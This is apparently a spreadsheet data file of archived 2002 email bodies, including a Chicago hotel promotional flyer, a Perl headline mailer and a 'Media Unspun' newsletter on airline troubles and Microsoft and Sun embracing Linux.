 Government Rate with only 6% Sales Tax (Chicago 14.9%, Rosemont 12%)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;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style='font-size:20.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;OHare
 Shuttle Service Available&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;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style='font-size:20.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;Free High
 Speed Internet Access&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;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style='font-size:20.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;Free
 Ample Parking&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;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style='font-size:20.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;State
 Certified Minority Business Enterprise (MBE) #363778006&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;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style='font-size:20.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;18000+
 Square Feet of Flexible Meeting Space&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;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style='font-size:20.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;#3 Rated
 Hotel for Customer Service in Entire Radisson Chain Worldwide*&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;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style='font-size:20.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;Great
 Restaurants, Shopping &amp;amp; Activities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p class=MsoNormal style='margin-left:.5in;text-indent:-.25in;mso-list:l0 level1 lfo1;
 tab-stops:list .5in'&gt;&lt;![if !supportLists]&gt;&lt;span style='font-size:20.0pt;
 mso-bidi-font-size:10.0pt;font-family:Symbol;mso-bidi-font-family:Tahoma'&gt;&lt;span
 style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;![endif]&gt;&lt;span
 style='font-size:20.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;FEMA
 #IL-0458 and ADA Compliant&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p class=MsoNormal style='margin-left:.25in'&gt;&lt;span style='font-size:16.0pt;
 mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;&lt;![if !supportEmptyParas]&gt;&amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;h5 align=center style='text-align:center'&gt;Contact Riz Bhatti @ 1847-677-1234
 ext. 6884 or&lt;/h5&gt;
 &lt;h6&gt;Donald Bae @ 1847-677-1234 ext. 6880&lt;/h6&gt;
 &lt;p class=MsoHeading7&gt;Take a virtual tour of our hotel @ &lt;a
 href="http://www.radisson-chicago.com/"&gt;www.radisson-chicago.com&lt;/a&gt;&lt;/p&gt;
 &lt;p class=MsoNormal align=center style='text-align:center'&gt;&lt;span
 style='font-size:16.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;&lt;![if !supportEmptyParas]&gt;&amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;
 &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p class=MsoNormal align=center style='text-align:center'&gt;&lt;span
 style='font-size:16.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;&lt;![if !supportEmptyParas]&gt;&amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;
 &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p class=MsoNormal align=center style='text-align:center'&gt;&lt;span
 style='font-family:Tahoma'&gt;December 2001 Customer Satisfaction Survey-Radisson
 Worldwide Hotels and Resorts&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-10-01
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 This Week on perl5-porters (23-29 September 2002)
     posted by rafael on Monday September 30, @17:26 (summaries)
     http://use.perl.org/article.pl?sid=02/09/30/2151221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</si>
  <si>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United We Fall?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format...
 ------------=_1029244856-11739-4
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 To view this newsletter in full-color, visit:
 http://newsletter.mediaunspun.com/index000018904.cfm
 MEDIA UNSPUN
 What the Press is Reporting and Why (www.mediaunspun.com)
 -----------------------------------------------------------------
 August 13, 2002
 -----------------------------------------------------------------
 IN THIS ISSUE
 -----------------------------------------------------------------
 * UNITED WE FALL?
 * SLEEPING WITH THE PENGUIN
 * OTHER STORIES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ADVERTISEMENT
 -----------------------------------------------------------------
 Ken Fisher offers his Quarterly Report for high net worth
 investors FREE of cost &amp; without obligation. Access the same
 investment research he uses to guide his clients at:
 http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000
 -----------------------------------------------------------------
 UNITED WE FALL?
 -----------------------------------------------------------------
 US Airways scored a $500 million bankruptcy court bailout.
 American Airlines announced a re-org. United Airlines' parent
 company's stock sank on speculation that UAL is next in line for 
 Chapter 11. It's a wonder none of this happened last September,
 but it's not much consolation to airline employees,
 shareholders, and customers that it's happening now.
 The Wall Street Journal had the most extensive coverage of
 American's plan as of Unspun's deadline. The airline will lay
 off 7,000 workers, ground some jets, cut back on flight
 amenities such as food, and retool its hub operations to make
 for longer layovers. "In the past, airlines were loath to have
 longer connection times because flights were listed in travel
 agents' computers by elapsed time," said the Journal. "Now,
 online booking tools and search engines most often list flights
 by price, not time." In this age of penny-pinching, American's
 worried about low-cost carriers, not the big guys like, um, US
 Air and United. 
 Speaking of United, it's hard to come up with a verb for its
 parent company's stock that doesn't invoke an air disaster.
 Let's just say it didn't go up yesterday. The $3.80 share price
 may be the least of UAL's worries while it waits for an
 increasingly unlikely $1.8 billion loan from the Air
 Transportation Stabilization Board. "The ATSB expects an
 applicant's workers, suppliers and creditors to make concessions 
 to help the airline repay the loans and thus protect U.S.
 taxpayers' interests," said the L.A. Times. Sounds nice for
 uninvolved taxpayers but not so good to some of United's unions, 
 which are balking at a wage cut. Workers did enough by deferring 
 $498 million in retroactive pay this year, said the
 36,000-member machinists' union. Analysts moaned in anti-labor
 frustration. 
 The basic problem here is too many empty airplane seats, and
 non-U.S. outlets didn't have a lot of sympathy. "The U.S.
 government has bailed out carriers with insurance subsidies and
 federal loan guarantees" while "European authorities have acted
 more wisely," letting Swissair and Sabena "go to the wall," said 
 the Financial Times. Canadian pundits agreed that America should 
 let a couple of airlines wilt, since the Canadian airline
 industry benefited from the demise of Canadian Airlines and
 Canada 3000. Paging Charles Darwin to the white courtesy
 phone... - Jen Muehlbauer
 -----------------------------------------------------------------
 ADVERTISEMENT
 -----------------------------------------------------------------
 You've heard about identity management, but do you know about
 the opportunities and business models that will emerge as a
 result? Download a free executive summary of Esther Dyson's coverage of
 identity management in Release 1.0. Learn more about the
 expanding market for these services and applications.
 http://release1.edventure.com/executivesummary.cfm?MCode=Unspun
 -----------------------------------------------------------------
 SLEEPING WITH THE PENGUIN
 -----------------------------------------------------------------
 The LinuxWorld Conference and Expo, which opened yesterday in
 San Francisco, will host two of the strangest bedfellows ever to 
 lie down with a stuffed penguin: Microsoft and Sun. These are
 companies that once referred to Linux as a "bathtub of code"
 (Sun) and "a cancer" (Microsoft), according to Sun's hometown
 paper the San Jose Mercury News.
 Both companies are taking Linux seriously despite the absolute
 numbers. By January 2, 2001, Microsoft had made as much on
 server software as all Linux vendors put together would reap in
 the entire year.
 Honors for the best attention-grabber on Microsoft's presence at 
 the show go to Brier Dudley, who opened his piece for the
 Seattle Times this way: "Microsoft executive Peter Houston
 wasn't too worried about the reception he'd get at LinuxWorld
 ... until he heard about the pie cannon."
 Wired informed us that the section of LinuxWorld where Microsoft 
 will be holding the fort is dubbed the Rookery -- "a place where 
 you can watch companies hatch and grow right before your eyes,"
 deadpanned reporter Michelle Delio, quoting Microsoft's Houston: 
 "Hatching isn't exactly on the agenda, but I certainly hope to
 grow."
 Turning to Sun, Unspun notes that five years ago a joke press
 release circulated on the Net claiming that Linux creator Linus
 Torvalds, then still living in Finland, was moving to Silicon
 Valley to work for Sun. The joke was that Sun had decided to
 scrap its Solaris operating system and instead concentrate on a
 version of Linux, to be called "Solinux." How time does make
 April fools of us all: Linus Torvalds is now thriving in Silicon 
 Valley (at Transmeta), and yesterday Sun Microsystems
 demonstrated Sun Linux 5.0. and introduced its first
 general-purpose servers running Linux.
 The Merc ran a comprehensive wrap of Sun's evolving attitude
 toward the upstart operating system. Sun has little choice but
 to embrace Linux, wrote reporter Therese Poletti, because some
 of its traditional Wall Street customers were deserting it.
 "Several investment banks have tossed out whole sections of Sun
 servers and replaced them with Intel-based servers running
 Linux," Poletti reported. And you thought Microsoft hated Linux? 
 - Keith Dawson
 Linux expo has come a long way
 http://www.siliconvalley.com/mld/siliconvalley/3847040.htm
 Microsoft changes its tune toward Linux (Seattle Times)
 http://makeashorterlink.com/?Q12B23181
 Microsoft Puts On the Tux 
 http://www.wired.com/news/linux/0,1411,54489,00.html
 (Hoax press release on "Solinux")
 http://www.ibiblio.org/dbarberi/fools/classic/1997/sun-pr.html
 Sun to name Linux-Solaris chief 
 http://news.com.com/2100-1001-949469.html
 Sun Microsystems flexes Linux to jab at Microsoft (Seattle
 Times)
 http://makeashorterlink.com/?A25B52181
 Microsoft and Free Software at the Same Show? It's True
 http://www.nytimes.com/2002/08/10/technology/10LINU.html
 Linux begins its descent into the enterprise
 http://www.internetnews.com/ent-news/article.php/1443811
 -----------------------------------------------------------------
 OTHER STORIES
 -----------------------------------------------------------------
 Ex-CEO Pleads Not Guilty to ImClone Fraud
 http://www.washingtonpost.com/wp-dyn/articles/A10407-2002Aug12.html
 Security flaw found in Microsoft Web browser (Reuters)
 http://www.philly.com/mld/philly/business/technology/3851394.htm
 Fed seen leaving rates unchanged
 http://www.msnbc.com/news/793177.asp
 Some Sad No-Signs of the Times 
 http://www.businessweek.com/bwdaily/dnflash/aug2002/nf20020813_0067.htm
 Publisher dodges bankruptcy bullet
 http://www.chicagotribune.com/business/chi-020812ziff.story
 Gates Foundation Walks Fine Line As It Increases Its Cable
 Holdings
 http://online.wsj.com/article/0,,SB1029180416481589035,00.html
 (Paid subscription required.)
 PGP defect reveals encrypted messages
 http://news.com.com/2100-1001-949368.html
 Bell Labs simplifies single sign-on
 http://www.theregister.co.uk/content/55/26624.html
 Bigger Bar Code Inches Up on Retailers
 http://www.nytimes.com/2002/08/12/technology/12CODE.html
 Damn the Constitution: Europe must take back the Web
 http://www.theregister.co.uk/content/6/26612.html
 Japanese Drop Out of New ID System (Newsday, AP)
 http://makeashorterlink.com/?T69B22181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Marketing: Cowpoke Productions (cowpokeproductions.com.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http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@example.com
 To receive future messages in HTML format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Chtm
 To change your subscriber information, use this link:
 http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@example.com
 ------------=_1029244856-11739-4
 Content-Type: text/html; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;title&gt;M E D I A  U N S P U N&lt;/title&gt;
 &lt;!--  
 **********************************************************
 If you can read this message but the rest of the email 
 contains strange characters, your email program is not
 capable of displaying HTML email. Use your browser to read the
 complete newsletter online at: 
    http://newsletter.mediaunspun.com/
 To receive future messages in plain text format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Ctxt
 **********************************************************
 CREATED: August 13, 2002   
 --&gt;
 &lt;meta name="description" content=""&gt;
 &lt;meta name="keywords" content=""&gt;
 &lt;meta name="GENERATOR" content="iMakeNews"&gt;
 &lt;meta name="robots" content="ALL"&gt;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.a225813917453734-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a225813917453734-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917453734-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a225813917453734-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917453734-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917453734-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917453734-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917453734-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a225813917453734-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917453734-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a225813917453734-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a22581391745353-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a22581391745353-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a22581391745353-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a225813917459043-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a225813917459043-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a225813917459043-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Footer Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a225813917473867-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a225813917473867-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917473867-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a225813917473867-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917473867-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917473867-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917473867-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917473867-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a225813917473867-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917473867-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a225813917473867-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}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 &lt;table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000018904.cfm&amp;XXDESXXissue_id=18904&amp;XXDESXXtitle=M%20E%20D%20I%20A%20%20U%20N%20S%20P%20U%20N"
 			 class="a225813917453734-footer_tellafriend"&gt;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src="http://a298.g.akamai.net/7/298/5382/081302091747/www.imakenews.com/mediaunspun/mediaunspun_logo.GIF" BORDER="0" alt="M E D I A  U N S P U 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Tuesday, August 13, 2002
 				&lt;/font&gt;
 			&lt;/td&gt;
 				&lt;td align="center" width="34%"&gt;
 			&lt;/td&gt;
 				&lt;td align="right" width="33%"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 			&lt;!-- COLUMN: 1 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;table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HREF="#a87484"
 						class="a22581391745353-contents_article_title"
 				&gt;
 			United We Fall?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HREF="#a87485"
 						class="a225813917459043-contents_article_title"
 				&gt;
 			Sleeping with the Penguin
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
 		 &lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a87486"
 						class="a225813917459043-contents_article_title"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&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Media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&lt;P&gt;Ken Fisher offers his Quarterly Report for high net worth investors FREE of cost &amp; without obligation. Access the same investment research he uses to guide his clients at:&lt;br&gt;
 &lt;A HREF="http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000"&gt;http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000&lt;/A&gt;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name="a87484"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			United We Fall?
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;US Airways scored a $500 million bankruptcy court bailout. American Airlines announced a re-org. United Airlines' parent company's stock sank on speculation that UAL is next in line for Chapter 11. It's a wonder none of this happened last September, but it's not much consolation to airline employees, shareholders, and customers that it's happening now.&lt;/P&gt;&lt;P&gt;
 The Wall Street Journal had the most extensive coverage of American's plan as of Unspun's deadline. The airline will lay off 7,000 workers, ground some jets, cut back on flight amenities such as food, and retool its hub operations to make for longer layovers. "In the past, airlines were loath to have longer connection times because flights were listed in travel agents' computers by elapsed time," said the Journal. "Now, online booking tools and search engines most often list flights by price,
 not time." In this age of penny-pinching, American's worried about low-cost carriers, not the big guys like, um, US Air and United. &lt;/P&gt;&lt;P&gt;
 Speaking of United, it's hard to come up with a verb for its parent company's stock that doesn't invoke an air disaster. Let's just say it didn't go up yesterday. The $3.80 share price may be the least of UAL's worries while it waits for an increasingly unlikely $1.8 billion loan from the Air Transportation Stabilization Board. "The ATSB expects an applicant's workers, suppliers and creditors to make concessions to help the airline repay the loans and thus protect U.S. taxpayers' interests,"
 said the L.A. Times. Sounds nice for uninvolved taxpayers but not so good to some of United's unions, which are balking at a wage cut. Workers did enough by deferring $498 million in retroactive pay this year, said the 36,000-member machinists' union. Analysts moaned in anti-labor frustration. &lt;/P&gt;&lt;P&gt;
 The basic problem here is too many empty airplane seats, and non-U.S. outlets didn't have a lot of sympathy. "The U.S. government has bailed out carriers with insurance subsidies and federal loan guarantees" while "European authorities have acted more wisely," letting Swissair and Sabena "go to the wall," said the Financial Times. Canadian pundits agreed that America should let a couple of airlines wilt, since the Canadian airline industry benefited from the demise of Canadian Airlines and
 Canada 3000. Paging Charles Darwin to the white courtesy phone... - Jen Muehlbauer&lt;/P&gt;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You've heard about identity management, but do you know about the opportunities and business models that will emerge as a result? &lt;a href="http://release1.edventure.com/executivesummary.cfm?MCode=Unspun"&gt;Download&lt;/a&gt; a free executive summary of Esther Dyson's coverage of identity management in Release 1.0. Learn more about the expanding market for these services and applications.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name="a87485"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Sleeping with the Penguin
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;The LinuxWorld Conference and Expo, which opened yesterday in San Francisco, will host two of the strangest bedfellows ever to lie down with a stuffed penguin: Microsoft and Sun. These are companies that once referred to Linux as a "bathtub of code" (Sun) and "a cancer" (Microsoft), according to Sun's hometown paper the San Jose Mercury News.&lt;/P&gt;&lt;P&gt;
 Both companies are taking Linux seriously despite the absolute numbers. By January 2, 2001, Microsoft had made as much on server software as all Linux vendors put together would reap in the entire year.&lt;/P&gt;&lt;P&gt;
 Honors for the best attention-grabber on Microsoft's presence at the show go to Brier Dudley, who opened his piece for the Seattle Times this way: "Microsoft executive Peter Houston wasn't too worried about the reception he'd get at LinuxWorld ... until he heard about the pie cannon."&lt;/P&gt;&lt;P&gt;
 Wired informed us that the section of LinuxWorld where Microsoft will be holding the fort is dubbed the Rookery -- "a place where you can watch companies hatch and grow right before your eyes," deadpanned reporter Michelle Delio, quoting Microsoft's Houston: "Hatching isn't exactly on the agenda, but I certainly hope to grow."&lt;/P&gt;&lt;P&gt;
 Turning to Sun, Unspun notes that five years ago a joke press release circulated on the Net claiming that Linux creator Linus Torvalds, then still living in Finland, was moving to Silicon Valley to work for Sun. The joke was that Sun had decided to scrap its Solaris operating system and instead concentrate on a version of Linux, to be called "Solinux." How time does make April fools of us all: Linus Torvalds is now thriving in Silicon Valley (at Transmeta), and yesterday Sun Microsystems
 demonstrated Sun Linux 5.0. and introduced its first general-purpose servers running Linux.&lt;/P&gt;&lt;P&gt;
 The Merc ran a comprehensive wrap of Sun's evolving attitude toward the upstart operating system. Sun has little choice but to embrace Linux, wrote reporter Therese Poletti, because some of its traditional Wall Street customers were deserting it. "Several investment banks have tossed out whole sections of Sun servers and replaced them with Intel-based servers running Linux," Poletti reported. And you thought Microsoft hated Linux? - Keith Dawson&lt;/P&gt;&lt;P&gt;
 Linux expo has come a long way&lt;br&gt;
 &lt;A HREF="http://www.siliconvalley.com/mld/siliconvalley/3847040.htm"&gt;http://www.siliconvalley.com/mld/siliconvalley/3847040.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Microsoft changes its tune toward Linux (Seattle Times)&lt;br&gt;
 &lt;A HREF="http://makeashorterlink.com/?Q12B23181"&gt;http://makeashorterlink.com/?Q12B23181&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Microsoft Puts On the Tux &lt;br&gt;
 &lt;A HREF="http://www.wired.com/news/linux/0,1411,54489,00.html"&gt;http://www.wired.com/news/linux/0,1411,54489,00.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 (Hoax press release on "Solinux")&lt;br&gt;
 &lt;A HREF="http://www.ibiblio.org/dbarberi/fools/classic/1997/sun-pr.html"&gt;http://www.ibiblio.org/dbarberi/fools/classic/1997/sun-pr.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Sun to name Linux-Solaris chief &lt;br&gt;
 &lt;A HREF="http://news.com.com/2100-1001-949469.html"&gt;http://news.com.com/2100-1001-949469.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Sun Microsystems flexes Linux to jab at Microsoft (Seattle Times)&lt;br&gt;
 &lt;A HREF="http://makeashorterlink.com/?A25B52181"&gt;http://makeashorterlink.com/?A25B52181&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Microsoft and Free Software at the Same Show? It's True&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/10/technology/10LINU.html"&gt;http://www.nytimes.com/2002/08/10/technology/10LINU.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Linux begins its descent into the enterprise&lt;br&gt;
 &lt;A HREF="http://www.internetnews.com/ent-news/article.php/1443811"&gt;http://www.internetnews.com/ent-news/article.php/1443811&lt;/A&gt; &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		 &lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	 &lt;a name="a87486"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Other Stories
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Ex-CEO Pleads Not Guilty to ImClone Fraud&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A10407-2002Aug12.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A10407-2002Aug12.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Security flaw found in Microsoft Web browser (Reuters)&lt;br&gt;
 &lt;A HREF="http://www.philly.com/mld/philly/business/technology/3851394.htm"&gt;http://www.philly.com/mld/philly/business/technology/3851394.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Fed seen leaving rates unchanged&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/793177.asp"&gt;http://www.msnbc.com/news/793177.asp&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Some Sad No-Signs of the Times &lt;br&gt;
 &lt;A HREF="http://www.businessweek.com/bwdaily/dnflash/aug2002/nf20020813_0067.htm"&gt;http://www.businessweek.com/bwdaily/dnflash/aug2002/nf20020813_0067.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Publisher dodges bankruptcy bullet&lt;br&gt;
 &lt;A HREF="http://www.chicagotribune.com/business/chi-020812ziff.story"&gt;http://www.chicagotribune.com/business/chi-020812ziff.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Gates Foundation Walks Fine Line As It Increases Its Cable Holdings&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1029180416481589035,00.html"&gt;http://online.wsj.com/article/0,,SB1029180416481589035,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.)&lt;/P&gt;&lt;P&gt;
 PGP defect reveals encrypted messages&lt;br&gt;
 &lt;A HREF="http://news.com.com/2100-1001-949368.html"&gt;http://news.com.com/2100-1001-949368.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Bell Labs simplifies single sign-on&lt;br&gt;
 &lt;A HREF="http://www.theregister.co.uk/content/55/26624.html"&gt;http://www.theregister.co.uk/content/55/26624.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Bigger Bar Code Inches Up on Retailers&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/12/technology/12CODE.html"&gt;http://www.nytimes.com/2002/08/12/technology/12CODE.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Damn the Constitution: Europe must take back the Web&lt;br&gt;
 &lt;A HREF="http://www.theregister.co.uk/content/6/26612.html"&gt;http://www.theregister.co.uk/content/6/26612.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Japanese Drop Out of New ID System (Newsday, AP)&lt;br&gt;
 &lt;A HREF="http://makeashorterlink.com/?T69B22181"&gt;http://makeashorterlink.com/?T69B22181&lt;/A&gt; &lt;/P&gt;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Marketing: Cowpoke Productions (&lt;a href="http://www.cowpokeproductions.com"&gt;cowpokeproductions.com&lt;/a&gt;).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value="http://newsletter.mediaunspun.com/index000018904.cfm"&gt;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COLUMN: 3 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;table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000018904.cfm&amp;XXDESXXissue_id=18904&amp;XXDESXXtitle=M%20E%20D%20I%20A%20%20U%20N%20S%20P%20U%20N"
 			 class="a225813917473867-footer_tellafriend"&gt;
 			&lt;font size=4&gt;TELL A FRIEND&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/div&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 			&lt;!-- COLUMN: 4 --&gt;
